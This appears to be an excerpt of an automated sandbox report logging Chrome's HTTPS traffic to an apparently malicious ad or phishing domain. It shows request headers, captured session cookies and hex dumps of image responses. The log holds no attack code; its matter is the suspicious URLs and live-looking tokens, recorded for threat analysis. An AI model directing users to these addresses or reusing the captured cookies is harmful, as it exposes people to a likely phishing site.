                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:50 UTC663INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:50 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 1400
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab230"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SGlfBlP2J4Ktn4U2G37VOzllSKFMfXE4lXMv1WSWv7bS7uq6nF6rn5a%2BV2yV4Ec%2FZPt8vwZlIx36HSO6x4qM0wQPxTDOdgM9WtPDv1%2FQjt726Rs3B5QkxDKQee2CUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9359cea3b9-SEA
                                                                                                                                      2024-05-08 18:12:50 UTC706INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                                                                                                      Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                                                                                                      2024-05-08 18:12:50 UTC694INData Raw: f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0 ff ad 2f b3 39 4c
                                                                                                                                      Data Ascii: te~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s/9L


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      47192.168.2.1649767104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:49 UTC1562OUTGET /klMyUbEL6fKFla9Kr8ExT4Sp0CURklZAPvRG8XprsvgVF6eR20YVyojUy5uv216 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:50 UTC666INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:50 GMT
                                                                                                                                      Content-Type: image/svg+xml
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="klMyUbEL6fKFla9Kr8ExT4Sp0CURklZAPvRG8XprsvgVF6eR20YVyojUy5uv216"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Q132EZT2Bx6zrSIdTlL4CpfWHZlFLvddKAV578T60gjZE7RlXLb06%2FaShtB8VRRP1p0RL1AGm4Ld6iv6TjsptobhknMkSLo7St%2F0rhskaE%2FKKm2nVPK7vkezfH9iw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b961d2875ce-SEA
                                                                                                                                      2024-05-08 18:12:50 UTC703INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                                                                                      Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                                                                                      2024-05-08 18:12:50 UTC1168INData Raw: 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d
                                                                                                                                      Data Ascii: 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color=
                                                                                                                                      2024-05-08 18:12:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      48192.168.2.1649769104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:50 UTC1163OUTGET /klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab230 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:51 UTC663INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:51 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 1400
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="klU9KZQ56usLE89rVZhW6EvSGnlmL6U9fLwsF2zEvKwopEY9bQKaO7rWoafPGfbDjab230"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fh77tQ7PeevibxdcNL%2BHMD4Mjklw5guZW6M7Xsfgp5ZH460ghJuX4h9Oj11q1UmXJnJrot1zAHHTTgXtOKoHrchE0j9HPgg9sefR%2FXty2NaqU%2BAsoIu8Fld7yuZ0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9a2bb7761b-SEA
                                                                                                                                      2024-05-08 18:12:51 UTC706INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                                                                                                      Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                                                                                                      2024-05-08 18:12:51 UTC694INData Raw: f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0 ff ad 2f b3 39 4c
                                                                                                                                      Data Ascii: te~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s/9L


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      49192.168.2.1649768104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:50 UTC1135OUTGET /qzgXe6GTtpy9MQNktQ1m82zcabjeVXbE6XxvQzPom7 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:51 UTC581INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 08 May 2024 18:12:51 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z2fODDjw9Fq2NzGRFaBeNDOVfo6dNt3cbDeSQxuyRacNmfTBtfKGR%2FgQAXAb64DrXfTTXp%2BvnM76%2BurV4pXVhYVN6mpaPWQ1pQcFzMOy7r%2BFwE4XlmEJaxkuG63MVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9a2f007636-SEA
                                                                                                                                      2024-05-08 18:12:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      50192.168.2.1649771104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1548OUTGET /uv6rIFznx1ttRnsWBQkXMgsteCK16wIxP3EEivS6Lgi834130 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:51 UTC639INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:51 GMT
                                                                                                                                      Content-Type: image/png
                                                                                                                                      Content-Length: 231
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="uv6rIFznx1ttRnsWBQkXMgsteCK16wIxP3EEivS6Lgi834130"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRqN0ZQqkm37AgPXUaaqeDEqCz8vBdPWw5KLtpMFz5UgT5cxwJ1OsAZsWqhgFwuws6%2Fo13tZPhPi6f7HJCMehKul5QKLUvH0zZUjb5vwWSUXvdFf%2B5EXtFj4WX73GA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b9c5abec76a-SEA
                                                                                                                                      2024-05-08 18:12:51 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                      Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      51192.168.2.1649770104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:51 UTC1543OUTGET /qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD45140 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
